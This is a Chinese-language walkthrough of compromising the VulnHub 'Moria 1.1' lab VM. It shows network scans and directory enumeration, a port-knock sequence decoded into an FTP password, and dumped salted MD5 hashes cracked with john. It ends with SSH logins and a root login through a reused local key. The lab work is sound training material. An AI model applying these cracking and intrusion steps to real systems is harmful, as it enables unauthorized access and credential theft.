Vulnhub之Moria靶机详细测试过程
Moria
作者: Jason_huawen
靶机基本信息
名称:Moria: 1.1
地址:
https://www.vulnhub.com/entry/moria-11,187/
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Moria]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.100 08:00:27:21:5d:d9 2 120 PCS Systemtechnik GmbH
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.253 08:00:27:0f:06:e9 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.253
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.253 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-05 06:17 EST
Nmap scan report for bogon (192.168.56.253)
Host is up (0.000090s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey:
| 2048 47:b5:ed:e3:f9:ad:96:88:c0:f2:83:23:7f:a3:d3:4f (RSA)
| 256 85:cd:a2:d8:bb:85:f6:0f:4e:ae:8c:aa:73:52:ec:63 (ECDSA)
|_ 256 b1:77:7e:08:b3:a0:84:f8:f4:5d:f9:8e:d5:85:b9:34 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Gates of Moria
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
MAC Address: 08:00:27:0F:06:E9 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.34 seconds
NMAP扫描结果表明目标主机有3个开放端口:21(FTP)、22(SSH)、80(HTTP)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ ftp 192.168.56.253
Connected to 192.168.56.253.
220 Welcome Balrog!
Name (192.168.56.253:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
目标主机FTP不允许匿名访问,Banner中的Balrog不知道是不是用户名。
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ gobuster dir -u http://192.168.56.253 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.253
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/05 06:22:52 Starting gobuster in directory enumeration mode
===============================================================
/w (Status: 301) [Size: 232] [--> http://192.168.56.253/w/]
Progress: 217219 / 220561 (98.48%)===============================================================
2022/12/05 06:23:19 Finished
===============================================================
发现了目录/w
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ curl http://192.168.56.253/w/h/i/s/p/e/r/the_abyss/
Maeglin:"The Balrog is not around, hurry!"
Maeglin是不是用户名?
但是利用hydra工具破解密码失败。
url:
http://192.168.56.253/w/h/i/s/p/e/r/the_abyss/
每次刷新内容都不一样,可能在读取一个文件
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ gobuster dir -u http://192.168.56.253/w/h/i/s/p/e/r/the_abyss/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.253/w/h/i/s/p/e/r/the_abyss/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,php,txt,sh
[+] Timeout: 10s
===============================================================
2022/12/05 06:34:51 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 231]
/index.php (Status: 200) [Size: 39]
/random.txt (Status: 200) [Size: 407]
Progress: 16434 / 1102805 (1.49%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
果然发现了一个文件/random.txt:
──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ curl http://192.168.56.253/w/h/i/s/p/e/r/the_abyss/random.txt
Balin: "Be quiet, the Balrog will hear you!"
Oin:"Stop knocking!"
Ori:"Will anyone hear us?"
Fundin:"That human will never save us!"
Nain:"Will the human get the message?"
"Eru! Save us!"
"We will die here.."
"Is this the end?"
"Knock knock"
"Too loud!"
Maeglin:"The Balrog is not around, hurry!"
Telchar to Thrain:"That human is slow, don't give up yet"
Dain:"Is that human deaf? Why is it not listening?"
这个random.txt出现的名字可能都是用户名。刷新页面,并同时用wireshark抓包:
在wireshark info栏中发现了端口knock的情况,顺序为:77 101 108 111 110 54 57
这些是ASCII编码,解码后得到:
77-M , 101-e , 108-l , 108-l , 111-o , 110-n , 54-6 , 57-9
即Mellon69
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ ssh balrog@192.168.56.253
The authenticity of host '192.168.56.253 (192.168.56.253)' can't be established.
ED25519 key fingerprint is SHA256:DS0S3vuDtg8fXxM4SuO7swJktN5DRaID2PhoSxZKb90.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.253' (ED25519) to the list of known hosts.
balrog@192.168.56.253's password:
Permission denied, please try again.
balrog@192.168.56.253's password:
发现密码不对。
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ ftp 192.168.56.253
Connected to 192.168.56.253.
220 Welcome Balrog!
Name (192.168.56.253:kali): Balrog
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||11077|).
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||37021|).
150 Here comes the directory listing.
drwxr-x--- 2 0 1001 27 Mar 14 2017 .
dr-xr-xr-x 18 0 0 258 Mar 14 2017 ..
-rw-r--r-- 1 0 0 1 Apr 28 2017 .bash_history
226 Directory send OK.
ftp> get .bash_history
local: .bash_history remote: .bash_history
229 Entering Extended Passive Mode (|||36051|).
550 Permission denied.
ftp> cd ..
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||49993|).
150 Here comes the directory listing.
dr-xr-xr-x 18 0 0 258 Mar 14 2017 .
dr-xr-xr-x 18 0 0 258 Mar 14 2017 ..
-rw-r--r-- 1 0 0 0 Mar 11 2017 .autorelabel
lrwxrwxrwx 1 0 0 7 Mar 11 2017 bin -> usr/bin
dr-xr-xr-x 4 0 0 4096 Mar 11 2017 boot
drwxr-xr-x 20 0 0 3000 Dec 05 19:04 dev
drwxr-xr-x 97 0 0 8192 Dec 05 19:04 etc
drwxr-x--- 4 0 1003 32 Mar 14 2017 home
lrwxrwxrwx 1 0 0 7 Mar 11 2017 lib -> usr/lib
lrwxrwxrwx 1 0 0 9 Mar 11 2017 lib64 -> usr/lib64
drwxr-xr-x 2 0 0 6 Nov 05 2016 media
drwxr-xr-x 2 0 0 6 Nov 05 2016 mnt
drwxr-xr-x 2 0 0 6 Nov 05 2016 opt
drwxr-x--- 2 0 1001 27 Mar 14 2017 prison
dr-xr-xr-x 115 0 0 0 Dec 05 11:04 proc
dr-xr-x--- 8 0 0 276 Mar 13 2017 root
drwxr-xr-x 26 0 0 760 Dec 05 19:04 run
lrwxrwxrwx 1 0 0 8 Mar 11 2017 sbin -> usr/sbin
drwxr-xr-x 2 0 0 6 Nov 05 2016 srv
dr-xr-xr-x 13 0 0 0 Dec 05 19:04 sys
drwxrwxrwt 8 0 0 170 Dec 05 19:48 tmp
drwxr-xr-x 13 0 0 155 Mar 11 2017 usr
drwxr-xr-x 21 0 0 4096 Dec 05 19:04 var
226 Directory send OK.
ftp> cd var
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||16970|).
150 Here comes the directory listing.
drwxr-xr-x 21 0 0 4096 Dec 05 19:04 .
dr-xr-xr-x 18 0 0 258 Mar 14 2017 ..
-rw-r--r-- 1 0 0 163 Mar 11 2017 .updated
drwxr-xr-x 2 0 0 6 Nov 05 2016 adm
drwxr-xr-x 9 0 0 100 Nov 05 2016 cache
drwxr-xr-x 2 0 0 6 Nov 07 2016 crash
drwxr-xr-x 3 0 0 34 Mar 11 2017 db
drwxr-xr-x 3 0 0 18 Nov 05 2016 empty
drwxr-xr-x 3 0 0 17 Nov 05 2016 ftp
drwxr-xr-x 2 0 0 6 Nov 05 2016 games
drwxr-xr-x 2 0 0 6 Nov 05 2016 gopher
drwxr-xr-x 3 0 0 18 Dec 06 2016 kerberos
drwxr-xr-x 39 0 0 4096 Dec 05 19:04 lib
drwxr-xr-x 2 0 0 6 Nov 05 2016 local
lrwxrwxrwx 1 0 0 11 Mar 10 2017 lock -> ../run/lock
drwxr-xr-x 11 0 0 4096 Dec 05 19:04 log
lrwxrwxrwx 1 0 0 10 Mar 11 2017 mail -> spool/mail
drwxr-xr-x 2 0 0 6 Nov 05 2016 nis
drwxr-xr-x 2 0 0 6 Nov 05 2016 opt
drwxr-xr-x 2 0 0 6 Nov 05 2016 preserve
lrwxrwxrwx 1 0 0 6 Mar 10 2017 run -> ../run
drwxr-xr-x 8 0 0 87 Nov 05 2016 spool
drwxrwxrwt 3 0 0 83 Dec 05 19:04 tmp
drwxr-xr-x 4 0 0 33 Nov 14 2016 www
drwxr-xr-x 2 0 0 6 Nov 05 2016 yp
226 Directory send OK.
ftp> cd www
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||55343|).
150 Here comes the directory listing.
drwxr-xr-x 4 0 0 33 Nov 14 2016 .
drwxr-xr-x 21 0 0 4096 Dec 05 19:04 ..
drwxr-xr-x 2 0 0 6 Nov 14 2016 cgi-bin
drwxr-xr-x 4 0 0 89 Mar 14 2017 html
226 Directory send OK.
ftp> cd html
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||22086|).
150 Here comes the directory listing.
drwxr-xr-x 4 0 0 89 Mar 14 2017 .
drwxr-xr-x 4 0 0 33 Nov 14 2016 ..
drwxr-xr-x 2 0 0 23 Mar 12 2017 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
-r-------- 1 48 48 85 Mar 12 2017 index.php
-r-------- 1 48 48 161595 Mar 11 2017 moria.jpg
drwxr-xr-x 3 0 0 15 Mar 12 2017 w
226 Directory send OK.
ftp> cd QlVraKW4fbIkXau9zkAPNGzviT3UKntl
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||43440|).
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 23 Mar 12 2017 .
drwxr-xr-x 4 0 0 89 Mar 14 2017 ..
-rw-r--r-- 1 0 0 1672 Mar 12 2017 index.php
226 Directory send OK.
ftp> cat index.php
?Invalid command.
ftp> get index.php
local: index.php remote: index.php
229 Entering Extended Passive Mode (|||59424|).
550 Permission denied.
ftp>
FTP无法下载,但这是WWW目录下的内容,看通过浏览器是否可以访问:
是用户名和加密后的密码
并且该页面源代码有注释:
<!--
6MAp84
bQkChe
HnqeN4
e5ad5s
g9Wxv7
HCCsxP
cC5nTr
h8spZR
tb9AWe
MD5(MD5(Password).Salt)
即每个密码的salt值和算法是知道的
将加密值与Salt值整理为一个文件
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ cat Usernameandpassword
Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84
Oin:727a279d913fba677c490102b135e51e$bQkChe
Ori:8c3c3152a5c64ffb683d78efc3520114$HnqeN4
Maeglin:6ba94d6322f53f30aca4f34960203703$e5ad5s
Fundin:c789ec9fae1cd07adfc02930a39486a1$g9Wxv7
Nain:fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP
Dain:6a113db1fd25c5501ec3a5936d817c29$cC5nTr
Thrain:7db5040c351237e8332bfbba757a1019$h8spZR
Telchar:dd272382909a4f51163c77da6356cc6f$tb9AWe
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ john -format=dynamic_6 Usernameandpassword
Using default input encoding: UTF-8
Loaded 9 password hashes with 9 different salts (dynamic_6 [md5(md5($p).$s) 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 23 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 18 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 14 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 18 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 33 candidates buffered for the current salt, minimum 48 needed for performance.
Warning: Only 28 candidates buffered for the current salt, minimum 48 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
flower (Balin)
warrior (Nain)
spanky (Ori)
rainbow (Oin)
abcdef (Dain)
fuckoff (Maeglin)
darkness (Thrain)
magic (Telchar)
hunter2 (Fundin)
9g 0:00:00:00 DONE 2/3 (2022-12-05 06:58) 128.5g/s 545357p/s 932557c/s 932557C/s PHOENIX..kids2
Use the "--show --format=dynamic_6" options to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ ssh Balin@192.168.56.253
Balin@192.168.56.253's password:
Permission denied, please try again.
Balin@192.168.56.253's password:
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ ssh warrior@192.168.56.253
warrior@192.168.56.253's password:
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ ssh Nain@192.168.56.253
Nain@192.168.56.253's password:
Permission denied, please try again.
Nain@192.168.56.253's password:
┌──(kali㉿kali)-[~/Vulnhub/Moria]
└─$ ssh Ori@192.168.56.253
Ori@192.168.56.253's password:
Last login: Sun Mar 12 22:57:09 2017
-bash-4.2$ id
uid=1002(Ori) gid=1003(notBalrog) groups=1003(notBalrog)
-bash-4.2$
提权
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC745Nxui7BYpnolFgEldIin1zw3/7D/RHsDSzkrUqPjkUGGkCTRT95kkhylllhS71rnJ8RkWeVQeyFWMPXYpO+8A0h+9NqU/T64as5KUX9vW23w6VVBbxuC8AlcaibzzVuxSe7mvgFenRLkcihERLaT0EeQ/tmaSGScLzcP7NOWf/a4e8f+mIDnHdoUoPPc3O8lA0SOf9T2mK+WMBVWu5drRMNgOeN7Gxm0bcK2x719CWPuyqyiyqZTZpcS7TdH+gc36OUyfbCgqJGdR2gI1o17n+VhLuV4xwyXwAjuEQyAldK50EYLIu7MO9tCBGLd04UCzvZhK4b920w2igQcuvh Ori@Prison
-bash-4.2$ cat know_hosts
cat: know_hosts: No such file or directory
-bash-4.2$ cat known_hosts
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=
known_hosts发现是连127.0.0.1
-bash-4.2$ ssh root@127.0.0.1
Last failed login: Mon Dec 5 15:01:17 EST 2022 from 192.168.56.253 on ssh:notty
There were 3 failed login attempts since the last successful login.
Last login: Fri Apr 28 18:01:27 2017
[root@Moria ~]# cd /root
[root@Moria ~]# ls -alh
total 52K
dr-xr-x---. 8 root root 276 Mar 12 2017 .
dr-xr-xr-x. 18 root root 258 Mar 14 2017 ..
-rw-r--r-- 1 root root 21 Mar 12 2017 0
-rw-------. 1 root root 1.3K Mar 9 2017 anaconda-ks.cfg
-rw-------. 1 root root 78 Apr 28 2017 .bash_history
-rw-r--r-- 1 root root 18 Dec 28 2013 .bash_logout
-rw-r--r-- 1 root root 176 Dec 28 2013 .bash_profile
-rw-r--r-- 1 root root 176 Dec 28 2013 .bashrc
drwx------. 7 root root 86 Mar 9 2017 .cache
drwxr-xr-x. 10 root root 128 Mar 9 2017 .config
-rw-r--r-- 1 root root 100 Dec 28 2013 .cshrc
drwxr-xr-x. 2 root root 6 Mar 9 2017 Desktop
-rw-r--r-- 1 root root 439 Mar 13 2017 flag.txt
-rw-r--r-- 1 root root 20 Mar 11 2017 hosts
-rw-------. 1 root root 8.5K Mar 12 2017 .ICEauthority
drwx------. 3 root root 19 Mar 9 2017 .local
drwxr-----. 3 root root 19 Mar 11 2017 .pki
drwx------ 2 root root 48 Mar 12 2017 .ssh
-rw-r--r-- 1 root root 129 Dec 28 2013 .tcshrc
[root@Moria ~]# cat flag.txt
“All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.
From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king.”
All That is Gold Does Not Glitter by J. R. R. Tolkien
I hope you suff.. enjoyed this VM. It wasn't so hard, was it?
-Abatchy
[root@Moria ~]#
STRIVE FOR PROGRESS,NOT FOR PERFECTION